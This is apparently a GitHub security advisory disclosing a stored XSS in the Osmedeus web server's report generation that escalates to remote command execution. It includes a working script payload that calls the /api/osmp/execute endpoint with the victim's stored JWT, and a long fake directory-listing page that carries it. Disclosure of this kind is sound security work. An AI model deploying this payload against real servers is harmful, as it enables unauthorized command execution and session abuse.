Headline
GHSA-wvv7-wm5v-w2gv: Osmedeus Web Server Vulnerable to Stored XSS, Leading to RCE
Summary
XSS occurs on the Osmedues web server when viewing results from the workflow, allowing commands to be executed on the server.
Details
When using a workflow that contains the summary module, it generates reports in HTML and Markdown formats. The default report is based on the general-template.md
template.
<p align="center">
<a href="https://www.osmedeus.org"><img alt="Osmedeus" src="https://raw.githubusercontent.com/osmedeus/assets/main/logo-transparent.png" height="140" /></a>
<br />
<br />
<strong>Execute Summary Generated by Osmedeus {{Version}} at <em>{{CurrentDay}}</em></strong>
<p align="center">
<a href="https://docs.osmedeus.org/"><img src="https://img.shields.io/badge/Documentation-0078D4?style=for-the-badge&logo=GitBook&logoColor=39ff14&labelColor=black&color=black"></a>
<a href="https://docs.osmedeus.org/donation/"><img src="https://img.shields.io/badge/Donation-0078D4?style=for-the-badge&logo=GitHub-Sponsors&logoColor=39ff14&labelColor=black&color=black"></a>
<a href="https://twitter.com/OsmedeusEngine"><img src="https://img.shields.io/badge/%40OsmedeusEngine-0078D4?style=for-the-badge&logo=Twitter&logoColor=39ff14&labelColor=black&color=black"></a>
</p>
</p>
## Scan Information
<scanInfo />
***
## 🚀 Subdomains
<content src="{{Output}}/subdomain/final-{{Workspace}}.txt" shorten=true />
***
## 🌐 HTTP Fingerprint
<content src="{{Output}}/fingerprint/beautify-{{Workspace}}-http.txt" />
***
## 🐞 Vulnerability
### List of Vulnerability Reports
- [**{{Workspace}}-report.html**]({{Output}}/vuln/active/{{Workspace}}-report.html)
- [**{{Workspace}}-sensitive.html**]({{Output}}/vuln/sensitive/{{Workspace}}-sensitive.html)
- [**{{Workspace}}-nuclei.html**]({{Output}}/vuln/nuclei/{{Workspace}}-nuclei.html)
### Jaeles Scan
<content src="{{Output}}/vuln/active/jaeles-summary.txt" />
<content src="{{Output}}/vuln/sensitive/jaeles-summary.txt" />
***
### Nuclei Scan
<content src="{{Output}}/vuln/nuclei/{{Workspace}}-nuclei-scan.txt" />
***
## 🕷️ Spider Content
<content src="{{Output}}/linkfinding/links-{{Workspace}}.txt"/>
***
## 📃 Content Discovery
<content src="{{Output}}/directory/unique-beautify-{{Workspace}}.txt" />
***
## 🔍 Port Scan
<content src="{{Output}}/portscan/open-ports.txt" />
***
The contents of the files are read and used to generate the report. However, the file contents are not properly filtered, leading to XSS The issue starts with processing the <content> tags, and XSS occurs when the extendTag function is called.
https://github.com/j3ssie/osmedeus/blob/815c261d44f6df1183d77b0b264060eec3168f00/core/markdown.go#L36 https://github.com/j3ssie/osmedeus/blob/815c261d44f6df1183d77b0b264060eec3168f00/core/markdown.go#L95 https://github.com/j3ssie/osmedeus/blob/815c261d44f6df1183d77b0b264060eec3168f00/core/markdown.go#L114 https://github.com/j3ssie/osmedeus/blob/815c261d44f6df1183d77b0b264060eec3168f00/core/markdown.go#L122-L124
The condition to enter this if branch must meet one of the following cases:
- Tag shorten=true: In the default template, only subdomains have this tag ⇒ Subdomains cannot contain special characters, so XSS is not possible.
- len(fileContent) > r.Opt.MDCodeBlockLimit: Simply put, the content length needs to exceed the MDCodeBlockLimit configuration (default is 10,000).
After reviewing the files loaded in the default template, we select Spider Content because it meets the conditions:
- It can contain special characters since the spider retrieves results through Katana ⇒ Katana parses content based on <a> tags ⇒ We can create custom payloads by leveraging this mechanism."
<! -- Fake Index Content -->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Directory listing for /</title>
</head>
<body>
<h1>Directory listing for /</h1>
<hr>
<ul>
<li><a href="1">1</a></li>
<li><a href="?abc=<script>alert(1)</script>">yxfzssjq_1721182234998.pdf</a></li>
</ul>
<hr>
</body>
</html>
- Easily bypass the condition len(fileContent) > r.Opt.MDCodeBlockLimit
- Spider is a module within the general workflow ⇒ a default workflow that is most commonly used
PoC
https://drive.google.com/file/d/1u-YowfzFV1tUqLaZk4s4Y1DykFhJZ8gR/view?usp=sharing
Payload RCE
<script>fetch(window.location.origin+'/api/osmp/execute',{method:'POST',body:JSON.stringify({command:'echo 1 >/tmp/js.txt',password:''}),headers:{Authorization:'Osmedeus '+localStorage.jwt,'Content-Type':'application/json'}});</script>
File index payload
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Directory listing for /</title>
</head>
<body>
<h1>Directory listing for /</h1>
<hr>
<ul>
<li><a href="1">1</a></li>
<li><a href="675559605-1278d133b090b74129f65f6d108d2c83.pdf">675559605-1278d133b090b74129f65f6d108d2c83.pdf</a></li>
<li><a href="959f770895133edc4cf65a4a02d12da8-syncbreezeent_setup_v10.0.28.exe">959f770895133edc4cf65a4a02d12da8-syncbreezeent_setup_v10.0.28.exe</a></li>
<li><a href="%5BMS-DOCX%5D-240416.docx">[MS-DOCX]-240416.docx</a></li>
<li><a href="AnyDesk.exe">AnyDesk.exe</a></li>
<li><a href="Attachment.zip">Attachment.zip</a></li>
<li><a href="barker.tar">barker.tar</a></li>
<li><a href="c1awptpm_1721182413858.pdf">c1awptpm_1721182413858.pdf</a></li>
<li><a href="cacert.der">cacert.der</a></li>
<li><a href="caido-desktop-logs-1729480323.zip">caido-desktop-logs-1729480323.zip</a></li>
<li><a href="caido-desktop-v0.41.0-win-x86_64.exe">caido-desktop-v0.41.0-win-x86_64.exe</a></li>
<li><a href="caido-desktop-v0.42.0-win-x86_64.exe">caido-desktop-v0.42.0-win-x86_64.exe</a></li>
<li><a href="cdd">cdd</a></li>
<li><a href="CentOS-7-live-GNOME-x86_64.iso">CentOS-7-live-GNOME-x86_64.iso</a></li>
<li><a href="chrome-integrate.zip">chrome-integrate.zip</a></li>
<li><a href="ChromeSetup.exe">ChromeSetup.exe</a></li>
<li><a href="Code_of_Conduct_Company_All-Consultants_v23_2023.01.12.pdf">Code_of_Conduct_Company_All-Consultants_v23_2023.01.12.pdf</a></li>
<li><a href="CxSAST.950.Release.Setup_9.5.0.100.7z">CxSAST.950.Release.Setup_9.5.0.100.7z</a></li>
<li><a href="C%C3%81C%20QUY%20%C4%90%E1%BB%8ANH%20%26%20TI%C3%8AU%20CHU%E1%BA%A8N%20C%E1%BA%A6N%20BI%E1%BA%BET%20CHO%20DOANH%20NGHI%E1%BB%86P%20NH%E1%BB%B0A%20XU%E1%BA%A4T%20KH%E1%BA%A8U%20V%C3%80O%20EU.pdf">CÁC QUY ĐỊNH & TIÊU CHUẨN CẦN BIẾT CHO DOANH NGHIỆP NHỰA XUẤT KHẨU VÀO EU.pdf</a></li>
<li><a href="Danh%20sach%20may%20chu%20T18.xlsx">Danh sach may chu T18.xlsx</a></li>
<li><a href="de4dot-net45.zip">de4dot-net45.zip</a></li>
<li><a href="de4dot-netcoreapp3.1.zip">de4dot-netcoreapp3.1.zip</a></li>
<li><a href="desktop.ini">desktop.ini</a></li>
<li><a href="disk-1.KkwpoIcO.vmdk.part">disk-1.KkwpoIcO.vmdk.part</a></li>
<li><a href="disk-1.vmdk">disk-1.vmdk</a></li>
<li><a href="dist.zip">dist.zip</a></li>
<li><a href="dnSpy-net-win64.zip">dnSpy-net-win64.zip</a></li>
<li><a href="doc.9.1.0.rar">doc.9.1.0.rar</a></li>
<li><a href="download">download</a></li>
<li><a href="Earned_Achievements_2024-09-16.pdf">Earned_Achievements_2024-09-16.pdf</a></li>
<li><a href="Eazfuscator.NET%202024.1%20Setup.msi">Eazfuscator.NET 2024.1 Setup.msi</a></li>
<li><a href="flare-ida-master.zip">flare-ida-master.zip</a></li>
<li><a href="gitlab-recovery-codes.txt">gitlab-recovery-codes.txt</a></li>
<li><a href="Hacking%20Rust.pdf">Hacking Rust.pdf</a></li>
<li><a href="Huong%20dan%20cai%20dat%20Oracle%20New.docx">Huong dan cai dat Oracle New.docx</a></li>
<li><a href="ida83_sdk_tools_v2.zip">ida83_sdk_tools_v2.zip</a></li>
<li><a href="ida84_sdk_tools.zip">ida84_sdk_tools.zip</a></li>
<li><a href="IDARustDemangler.py">IDARustDemangler.py</a></li>
<li><a href="idb2pat.py">idb2pat.py</a></li>
<li><a href="incident-notification_26.03.2024-2.pdf">incident-notification_26.03.2024-2.pdf</a></li>
<li><a href="ironword.2024.8.3.nupkg">ironword.2024.8.3.nupkg</a></li>
<li><a href="KCSC_Recruitment.pdf">KCSC_Recruitment.pdf</a></li>
<li><a href="K%E1%BA%BF%20ho%E1%BA%A1ch%20%C4%91%C3%A0o%20t%E1%BA%A1o%2005102023%20%282%29.xlsx">Kế hoạch đào tạo 05102023 (2).xlsx</a></li>
<li><a href="linkfinder.json">linkfinder.json</a></li>
<li><a href="Margherita%20Report%20Demo_report.pdf">Margherita Report Demo_report.pdf</a></li>
<li><a href="Mastering_Malware_Analysis.pdf">Mastering_Malware_Analysis.pdf</a></li>
<li><a href="M%E1%BA%ABu-Danh%20sach%20Quan%20ly%20Backup-CS_v1.xlsx">Mẫu-Danh sach Quan ly Backup-CS_v1.xlsx</a></li>
<li><a href="node-v20.17.0-x64.msi">node-v20.17.0-x64.msi</a></li>
<li><a href="OpenJDK21U-jdk_x64_windows_hotspot_21.0.4_7.zip">OpenJDK21U-jdk_x64_windows_hotspot_21.0.4_7.zip</a></li>
<li><a href="OSED%20Notes%20Study%20Overview%20by%20Joas%20Antonio.pdf">OSED Notes Study Overview by Joas Antonio.pdf</a></li>
<li><a href="PAKD%20paytech.xlsx">PAKD paytech.xlsx</a></li>
<li><a href="password">password</a></li>
<li><a href="patriotctf.rar">patriotctf.rar</a></li>
<li><a href="pestudio-9.59.zip">pestudio-9.59.zip</a></li>
<li><a href="photo_2023-01-04_09-04-52.jpg">photo_2023-01-04_09-04-52.jpg</a></li>
<li><a href="photo_2023-01-04_09-04-55%20%282%29.jpg">photo_2023-01-04_09-04-55 (2).jpg</a></li>
<li><a href="photo_2023-01-04_09-04-55.jpg">photo_2023-01-04_09-04-55.jpg</a></li>
<li><a href="photo_2024-09-27_09-47-55.jpg">photo_2024-09-27_09-47-55.jpg</a></li>
<li><a href="Ph%E1%BB%A5%20l%E1%BB%A5c%205.xlsx">Phụ lục 5.xlsx</a></li>
<li><a href="plugin.zip">plugin.zip</a></li>
<li><a href="processhacker-2.39-setup.exe">processhacker-2.39-setup.exe</a></li>
<li><a href="publications.pdf">publications.pdf</a></li>
<li><a href="pwnfox.json">pwnfox.json</a></li>
<li><a href="pykd_ext_2.0.0.25.zip">pykd_ext_2.0.0.25.zip</a></li>
<li><a href="rp-win.zip">rp-win.zip</a></li>
<li><a href="rs.zip">rs.zip</a></li>
<li><a href="rustup-init.exe">rustup-init.exe</a></li>
<li><a href="setup.exe">setup.exe</a></li>
<li><a href="Single%20Page%20Applications%20with%20Vue.js.rar">Single Page Applications with Vue.js.rar</a></li>
<li><a href="Skilled_Person_Registration_Template_2pWPpnl.xlsx">Skilled_Person_Registration_Template_2pWPpnl.xlsx</a></li>
<li><a href="snapshot_2024-10-03_12-14.zip">snapshot_2024-10-03_12-14.zip</a></li>
<li><a href="spire.doc.12.7.3.nupkg">spire.doc.12.7.3.nupkg</a></li>
<li><a href="spire.doc.9.1.0.nupkg">spire.doc.9.1.0.nupkg</a></li>
<li><a href="spire.doc.cpp.11.4.5.nupkg">spire.doc.cpp.11.4.5.nupkg</a></li>
<li><a href="sticker.webm">sticker.webm</a></li>
<li><a href="Telegram%20Desktop/">Telegram Desktop/</a></li>
<li><a href="test">test</a></li>
<li><a href="test.php">test.php</a></li>
<li><a href="test2">test2</a></li>
<li><a href="test1.php">test1.php</a></li>
<li><a href="test2.php">test2.php</a></li>
<li><a href="test3.php">test3.php</a></li>
<li><a href="test4.php">test4.php</a></li>
<li><a href="test5.php">test5.php</a></li>
<li><a href="test6.php">test6.php</a></li>
<li><a href="test7.php">test7.php</a></li>
<li><a href="test8.php">test8.php</a></li>
<li><a href="test9.php">test9.php</a></li>
<li><a href="test10.php">test10.php</a></li>
<li><a href="test11.php">test11.php</a></li>
<li><a href="test12.php">test12.php</a></li>
<li><a href="test13.php">test13.php</a></li>
<li><a href="test14.php">test14.php</a></li>
<li><a href="test15.php">test15.php</a></li>
<li><a href="test16.php">test16.php</a></li>
<li><a href="test17.php">test17.php</a></li>
<li><a href="test18.php">test18.php</a></li>
<li><a href="test19.php">test19.php</a></li>
<li><a href="test20.php">test20.php</a></li>
<li><a href="test21.php">test21.php</a></li>
<li><a href="test22.php">test22.php</a></li>
<li><a href="test23.php">test23.php</a></li>
<li><a href="test24.php">test24.php</a></li>
<li><a href="test25.php">test25.php</a></li>
<li><a href="test26.php">test26.php</a></li>
<li><a href="test27.php">test27.php</a></li>
<li><a href="test28.php">test28.php</a></li>
<li><a href="test29.php">test29.php</a></li>
<li><a href="test30.php">test30.php</a></li>
<li><a href="test31.php">test31.php</a></li>
<li><a href="test32.php">test32.php</a></li>
<li><a href="test33.php">test33.php</a></li>
<li><a href="test34.php">test34.php</a></li>
<li><a href="test35.php">test35.php</a></li>
<li><a href="test36.php">test36.php</a></li>
<li><a href="test37.php">test37.php</a></li>
<li><a href="test38.php">test38.php</a></li>
<li><a href="test39.php">test39.php</a></li>
<li><a href="test40.php">test40.php</a></li>
<li><a href="test41.php">test41.php</a></li>
<li><a href="test42.php">test42.php</a></li>
<li><a href="test43.php">test43.php</a></li>
<li><a href="test44.php">test44.php</a></li>
<li><a href="test45.php">test45.php</a></li>
<li><a href="test46.php">test46.php</a></li>
<li><a href="test47.php">test47.php</a></li>
<li><a href="test48.php">test48.php</a></li>
<li><a href="test49.php">test49.php</a></li>
<li><a href="test50.php">test50.php</a></li>
<li><a href="test51.php">test51.php</a></li>
<li><a href="test52.php">test52.php</a></li>
<li><a href="test53.php">test53.php</a></li>
<li><a href="test54.php">test54.php</a></li>
<li><a href="test55.php">test55.php</a></li>
<li><a href="test56.php">test56.php</a></li>
<li><a href="test57.php">test57.php</a></li>
<li><a href="test58.php">test58.php</a></li>
<li><a href="test59.php">test59.php</a></li>
<li><a href="test60.php">test60.php</a></li>
<li><a href="test61.php">test61.php</a></li>
<li><a href="test62.php">test62.php</a></li>
<li><a href="test63.php">test63.php</a></li>
<li><a href="test64.php">test64.php</a></li>
<li><a href="test65.php">test65.php</a></li>
<li><a href="test66.php">test66.php</a></li>
<li><a href="test67.php">test67.php</a></li>
<li><a href="test68.php">test68.php</a></li>
<li><a href="test69.php">test69.php</a></li>
<li><a href="test70.php">test70.php</a></li>
<li><a href="test71.php">test71.php</a></li>
<li><a href="test72.php">test72.php</a></li>
<li><a href="test73.php">test73.php</a></li>
<li><a href="test74.php">test74.php</a></li>
<li><a href="test75.php">test75.php</a></li>
<li><a href="test76.php">test76.php</a></li>
<li><a href="test77.php">test77.php</a></li>
<li><a href="test78.php">test78.php</a></li>
<li><a href="test79.php">test79.php</a></li>
<li><a href="test80.php">test80.php</a></li>
<li><a href="test81.php">test81.php</a></li>
<li><a href="test82.php">test82.php</a></li>
<li><a href="test83.php">test83.php</a></li>
<li><a href="test84.php">test84.php</a></li>
<li><a href="test85.php">test85.php</a></li>
<li><a href="test86.php">test86.php</a></li>
<li><a href="test87.php">test87.php</a></li>
<li><a href="test88.php">test88.php</a></li>
<li><a href="test89.php">test89.php</a></li>
<li><a href="test90.php">test90.php</a></li>
<li><a href="test91.php">test91.php</a></li>
<li><a href="test92.php">test92.php</a></li>
<li><a href="test93.php">test93.php</a></li>
<li><a href="test94.php">test94.php</a></li>
<li><a href="test95.php">test95.php</a></li>
<li><a href="test96.php">test96.php</a></li>
<li><a href="test97.php">test97.php</a></li>
<li><a href="test98.php">test98.php</a></li>
<li><a href="test99.php">test99.php</a></li>
<li><a href="test100.php">test100.php</a></li>
<li><a href="test101.php">test101.php</a></li>
<li><a href="test102.php">test102.php</a></li>
<li><a href="test103.php">test103.php</a></li>
<li><a href="test104.php">test104.php</a></li>
<li><a href="test105.php">test105.php</a></li>
<li><a href="test106.php">test106.php</a></li>
<li><a href="test107.php">test107.php</a></li>
<li><a href="test108.php">test108.php</a></li>
<li><a href="test109.php">test109.php</a></li>
<li><a href="test110.php">test110.php</a></li>
<li><a href="test111.php">test111.php</a></li>
<li><a href="test112.php">test112.php</a></li>
<li><a href="test113.php">test113.php</a></li>
<li><a href="test114.php">test114.php</a></li>
<li><a href="test115.php">test115.php</a></li>
<li><a href="test116.php">test116.php</a></li>
<li><a href="test117.php">test117.php</a></li>
<li><a href="test118.php">test118.php</a></li>
<li><a href="test119.php">test119.php</a></li>
<li><a href="test120.php">test120.php</a></li>
<li><a href="test121.php">test121.php</a></li>
<li><a href="test122.php">test122.php</a></li>
<li><a href="test123.php">test123.php</a></li>
<li><a href="test124.php">test124.php</a></li>
<li><a href="test125.php">test125.php</a></li>
<li><a href="test126.php">test126.php</a></li>
<li><a href="test127.php">test127.php</a></li>
<li><a href="test128.php">test128.php</a></li>
<li><a href="test129.php">test129.php</a></li>
<li><a href="test130.php">test130.php</a></li>
<li><a href="test131.php">test131.php</a></li>
<li><a href="test132.php">test132.php</a></li>
<li><a href="test133.php">test133.php</a></li>
<li><a href="test134.php">test134.php</a></li>
<li><a href="test135.php">test135.php</a></li>
<li><a href="test136.php">test136.php</a></li>
<li><a href="test137.php">test137.php</a></li>
<li><a href="test138.php">test138.php</a></li>
<li><a href="test139.php">test139.php</a></li>
<li><a href="test140.php">test140.php</a></li>
<li><a href="test141.php">test141.php</a></li>
<li><a href="test142.php">test142.php</a></li>
<li><a href="test143.php">test143.php</a></li>
<li><a href="test144.php">test144.php</a></li>
<li><a href="test145.php">test145.php</a></li>
<li><a href="test146.php">test146.php</a></li>
<li><a href="test147.php">test147.php</a></li>
<li><a href="test148.php">test148.php</a></li>
<li><a href="test149.php">test149.php</a></li>
<li><a href="test150.php">test150.php</a></li>
<li><a href="test151.php">test151.php</a></li>
<li><a href="test152.php">test152.php</a></li>
<li><a href="test153.php">test153.php</a></li>
<li><a href="test154.php">test154.php</a></li>
<li><a href="test155.php">test155.php</a></li>
<li><a href="test156.php">test156.php</a></li>
<li><a href="test157.php">test157.php</a></li>
<li><a href="test158.php">test158.php</a></li>
<li><a href="test159.php">test159.php</a></li>
<li><a href="test160.php">test160.php</a></li>
<li><a href="test161.php">test161.php</a></li>
<li><a href="test162.php">test162.php</a></li>
<li><a href="test163.php">test163.php</a></li>
<li><a href="test164.php">test164.php</a></li>
<li><a href="test165.php">test165.php</a></li>
<li><a href="test166.php">test166.php</a></li>
<li><a href="test167.php">test167.php</a></li>
<li><a href="test168.php">test168.php</a></li>
<li><a href="test169.php">test169.php</a></li>
<li><a href="test170.php">test170.php</a></li>
<li><a href="test171.php">test171.php</a></li>
<li><a href="test172.php">test172.php</a></li>
<li><a href="test173.php">test173.php</a></li>
<li><a href="test174.php">test174.php</a></li>
<li><a href="test175.php">test175.php</a></li>
<li><a href="test176.php">test176.php</a></li>
<li><a href="test177.php">test177.php</a></li>
<li><a href="test178.php">test178.php</a></li>
<li><a href="test179.php">test179.php</a></li>
<li><a href="test180.php">test180.php</a></li>
<li><a href="test181.php">test181.php</a></li>
<li><a href="test182.php">test182.php</a></li>
<li><a href="test183.php">test183.php</a></li>
<li><a href="test184.php">test184.php</a></li>
<li><a href="test185.php">test185.php</a></li>
<li><a href="test186.php">test186.php</a></li>
<li><a href="test187.php">test187.php</a></li>
<li><a href="test188.php">test188.php</a></li>
<li><a href="test189.php">test189.php</a></li>
<li><a href="test190.php">test190.php</a></li>
<li><a href="test191.php">test191.php</a></li>
<li><a href="test192.php">test192.php</a></li>
<li><a href="test193.php">test193.php</a></li>
<li><a href="test194.php">test194.php</a></li>
<li><a href="test195.php">test195.php</a></li>
<li><a href="test196.php">test196.php</a></li>
<li><a href="test197.php">test197.php</a></li>
<li><a href="test198.php">test198.php</a></li>
<li><a href="test199.php">test199.php</a></li>
<li><a href="test200.php">test200.php</a></li>
<li><a href="test201.php">test201.php</a></li>
<li><a href="test202.php">test202.php</a></li>
<li><a href="test203.php">test203.php</a></li>
<li><a href="test204.php">test204.php</a></li>
<li><a href="test205.php">test205.php</a></li>
<li><a href="test206.php">test206.php</a></li>
<li><a href="test207.php">test207.php</a></li>
<li><a href="test208.php">test208.php</a></li>
<li><a href="test209.php">test209.php</a></li>
<li><a href="test210.php">test210.php</a></li>
<li><a href="test211.php">test211.php</a></li>
<li><a href="test212.php">test212.php</a></li>
<li><a href="test213.php">test213.php</a></li>
<li><a href="test214.php">test214.php</a></li>
<li><a href="test215.php">test215.php</a></li>
<li><a href="test216.php">test216.php</a></li>
<li><a href="test217.php">test217.php</a></li>
<li><a href="test218.php">test218.php</a></li>
<li><a href="test219.php">test219.php</a></li>
<li><a href="test220.php">test220.php</a></li>
<li><a href="test221.php">test221.php</a></li>
<li><a href="test222.php">test222.php</a></li>
<li><a href="test223.php">test223.php</a></li>
<li><a href="test224.php">test224.php</a></li>
<li><a href="test225.php">test225.php</a></li>
<li><a href="test226.php">test226.php</a></li>
<li><a href="test227.php">test227.php</a></li>
<li><a href="test228.php">test228.php</a></li>
<li><a href="test229.php">test229.php</a></li>
<li><a href="test230.php">test230.php</a></li>
<li><a href="test231.php">test231.php</a></li>
<li><a href="test232.php">test232.php</a></li>
<li><a href="test233.php">test233.php</a></li>
<li><a href="test234.php">test234.php</a></li>
<li><a href="test235.php">test235.php</a></li>
<li><a href="test236.php">test236.php</a></li>
<li><a href="test237.php">test237.php</a></li>
<li><a href="test238.php">test238.php</a></li>
<li><a href="test239.php">test239.php</a></li>
<li><a href="test240.php">test240.php</a></li>
<li><a href="test241.php">test241.php</a></li>
<li><a href="test242.php">test242.php</a></li>
<li><a href="test243.php">test243.php</a></li>
<li><a href="test244.php">test244.php</a></li>
<li><a href="test245.php">test245.php</a></li>
<li><a href="test246.php">test246.php</a></li>
<li><a href="test247.php">test247.php</a></li>
<li><a href="test248.php">test248.php</a></li>
<li><a href="test249.php">test249.php</a></li>
<li><a href="test250.php">test250.php</a></li>
<li><a href="test251.php">test251.php</a></li>
<li><a href="test252.php">test252.php</a></li>
<li><a href="test253.php">test253.php</a></li>
<li><a href="test254.php">test254.php</a></li>
<li><a href="test255.php">test255.php</a></li>
<li><a href="test256.php">test256.php</a></li>
<li><a href="test257.php">test257.php</a></li>
<li><a href="test258.php">test258.php</a></li>
<li><a href="test259.php">test259.php</a></li>
<li><a href="test260.php">test260.php</a></li>
<li><a href="test261.php">test261.php</a></li>
<li><a href="test262.php">test262.php</a></li>
<li><a href="test263.php">test263.php</a></li>
<li><a href="test264.php">test264.php</a></li>
<li><a href="test265.php">test265.php</a></li>
<li><a href="test266.php">test266.php</a></li>
<li><a href="test267.php">test267.php</a></li>
<li><a href="test268.php">test268.php</a></li>
<li><a href="test269.php">test269.php</a></li>
<li><a href="test270.php">test270.php</a></li>
<li><a href="test271.php">test271.php</a></li>
<li><a href="test272.php">test272.php</a></li>
<li><a href="test273.php">test273.php</a></li>
<li><a href="test274.php">test274.php</a></li>
<li><a href="test275.php">test275.php</a></li>
<li><a href="test276.php">test276.php</a></li>
<li><a href="test277.php">test277.php</a></li>
<li><a href="test278.php">test278.php</a></li>
<li><a href="test279.php">test279.php</a></li>
<li><a href="test280.php">test280.php</a></li>
<li><a href="test281.php">test281.php</a></li>
<li><a href="test282.php">test282.php</a></li>
<li><a href="test283.php">test283.php</a></li>
<li><a href="test284.php">test284.php</a></li>
<li><a href="test285.php">test285.php</a></li>
<li><a href="test286.php">test286.php</a></li>
<li><a href="test287.php">test287.php</a></li>
<li><a href="test288.php">test288.php</a></li>
<li><a href="test289.php">test289.php</a></li>
<li><a href="test290.php">test290.php</a></li>
<li><a href="test291.php">test291.php</a></li>
<li><a href="test292.php">test292.php</a></li>
<li><a href="test293.php">test293.php</a></li>
<li><a href="test294.php">test294.php</a></li>
<li><a href="test295.php">test295.php</a></li>
<li><a href="test296.php">test296.php</a></li>
<li><a href="test297.php">test297.php</a></li>
<li><a href="test298.php">test298.php</a></li>
<li><a href="test299.php">test299.php</a></li>
<li><a href="test300.php">test300.php</a></li>
<li><a href="The.IDA.Pro.Book.2nd.Edition.Jun.2011.pdf">The.IDA.Pro.Book.2nd.Edition.Jun.2011.pdf</a></li>
<li><a href="ThuHo.rar">ThuHo.rar</a></li>
<li><a href="Vue.js%20Master%20Class%202024%20Edition.rar">Vue.js Master Class 2024 Edition.rar</a></li>
<li><a href="VueSchool%20-%20The%20Vue.js%203%20Masterclass%20%282024-4%29.rar">VueSchool - The Vue.js 3 Masterclass (2024-4).rar</a></li>
<li><a href="Vueschool_The_Vue.js_3_Masterclass_2021-11_Downloadly.ir/">Vueschool_The_Vue.js_3_Masterclass_2021-11_Downloadly.ir/</a></li>
<li><a href="Vueschool_The_Vue.js_3_Masterclass_2021-11_Downloadly.ir.part1.rar">Vueschool_The_Vue.js_3_Masterclass_2021-11_Downloadly.ir.part1.rar</a></li>
<li><a href="Vueschool_The_Vue.js_3_Masterclass_2021-11_Downloadly.ir.part2.rar">Vueschool_The_Vue.js_3_Masterclass_2021-11_Downloadly.ir.part2.rar</a></li>
<li><a href="Vueschool_The_Vue.js_3_Masterclass_2021-11_Downloadly.ir.part3.rar">Vueschool_The_Vue.js_3_Masterclass_2021-11_Downloadly.ir.part3.rar</a></li>
<li><a href="Vueschool_The_Vue.js_3_Masterclass_2021-11_Downloadly.ir.part4.rar">Vueschool_The_Vue.js_3_Masterclass_2021-11_Downloadly.ir.part4.rar</a></li>
<li><a href="win%20server%202016%281%29.ovf">win server 2016(1).ovf</a></li>
<li><a href="win%20server%202016.ovf">win server 2016.ovf</a></li>
<li><a href="?abc=<script>fetch(window.location.origin+'/api/osmp/execute',{method:'POST',body:JSON.stringify({command:'echo 1 >/tmp/js.txt',password:''}),headers:{Authorization:'Osmedeus '+localStorage.jwt,'Content-Type':'application/json'}});</script>">yxfzssjq_1721182234998.pdf</a></li>
</ul>
<hr>
</body>
</html>
Impact
Execute command on server
Summary
XSS occurs on the Osmedues web server when viewing results from the workflow, allowing commands to be executed on the server.
Details
When using a workflow that contains the summary module, it generates reports in HTML and Markdown formats. The default report is based on the general-template.md template.
<p align="center">
<a href="https://www.osmedeus.org"><img alt="Osmedeus" src="https://raw.githubusercontent.com/osmedeus/assets/main/logo-transparent.png" height="140" /></a>
<br />
<br />
<strong>Execute Summary Generated by Osmedeus {{Version}} at <em>{{CurrentDay}}</em></strong>
<p align="center">
<a href="https://docs.osmedeus.org/"><img src="https://img.shields.io/badge/Documentation-0078D4?style=for-the-badge&logo=GitBook&logoColor=39ff14&labelColor=black&color=black"></a>
<a href="https://docs.osmedeus.org/donation/"><img src="https://img.shields.io/badge/Donation-0078D4?style=for-the-badge&logo=GitHub-Sponsors&logoColor=39ff14&labelColor=black&color=black"></a>
<a href="https://twitter.com/OsmedeusEngine"><img src="https://img.shields.io/badge/%40OsmedeusEngine-0078D4?style=for-the-badge&logo=Twitter&logoColor=39ff14&labelColor=black&color=black"></a>
</p>
</p>
## Scan Information
<scanInfo />
***
## 🚀 Subdomains
<content src="{{Output}}/subdomain/final-{{Workspace}}.txt" shorten=true />
***
## 🌐 HTTP Fingerprint
<content src="{{Output}}/fingerprint/beautify-{{Workspace}}-http.txt" />
***
## 🐞 Vulnerability
### List of Vulnerability Reports
- [**{{Workspace}}-report.html**]({{Output}}/vuln/active/{{Workspace}}-report.html)
- [**{{Workspace}}-sensitive.html**]({{Output}}/vuln/sensitive/{{Workspace}}-sensitive.html)
- [**{{Workspace}}-nuclei.html**]({{Output}}/vuln/nuclei/{{Workspace}}-nuclei.html)
### Jaeles Scan
<content src="{{Output}}/vuln/active/jaeles-summary.txt" />
<content src="{{Output}}/vuln/sensitive/jaeles-summary.txt" />
***
### Nuclei Scan
<content src="{{Output}}/vuln/nuclei/{{Workspace}}-nuclei-scan.txt" />
***
## 🕷️ Spider Content
<content src="{{Output}}/linkfinding/links-{{Workspace}}.txt"/>
***
## 📃 Content Discovery
<content src="{{Output}}/directory/unique-beautify-{{Workspace}}.txt" />
***
## 🔍 Port Scan
<content src="{{Output}}/portscan/open-ports.txt" />
***
The contents of the files are read and used to generate the report. However, the file contents are not properly filtered, leading to XSS
The issue starts with processing the tags, and XSS occurs when the extendTag function is called.
https://github.com/j3ssie/osmedeus/blob/815c261d44f6df1183d77b0b264060eec3168f00/core/markdown.go#L36
https://github.com/j3ssie/osmedeus/blob/815c261d44f6df1183d77b0b264060eec3168f00/core/markdown.go#L95
https://github.com/j3ssie/osmedeus/blob/815c261d44f6df1183d77b0b264060eec3168f00/core/markdown.go#L114
https://github.com/j3ssie/osmedeus/blob/815c261d44f6df1183d77b0b264060eec3168f00/core/markdown.go#L122-L124
The condition to enter this if branch must meet one of the following cases:
- Tag shorten=true: In the default template, only subdomains have this tag ⇒ Subdomains cannot contain special characters, so XSS is not possible.
- len(fileContent) > r.Opt.MDCodeBlockLimit: Simply put, the content length needs to exceed the MDCodeBlockLimit configuration (default is 10,000).
After reviewing the files loaded in the default template, we select Spider Content because it meets the conditions:
It can contain special characters since the spider retrieves results through Katana ⇒ Katana parses content based on tags ⇒ We can create custom payloads by leveraging this mechanism."
<! – Fake Index Content --> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" “http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type” content="text/html; charset=utf-8"> <title>Directory listing for /</title> </head> <body> <h1>Directory listing for /</h1> <hr> <ul> <li><a href="1">1</a></li> <li><a href="?abc=<script>alert(1)</script>">yxfzssjq_1721182234998.pdf</a></li> </ul> <hr> </body> </html>
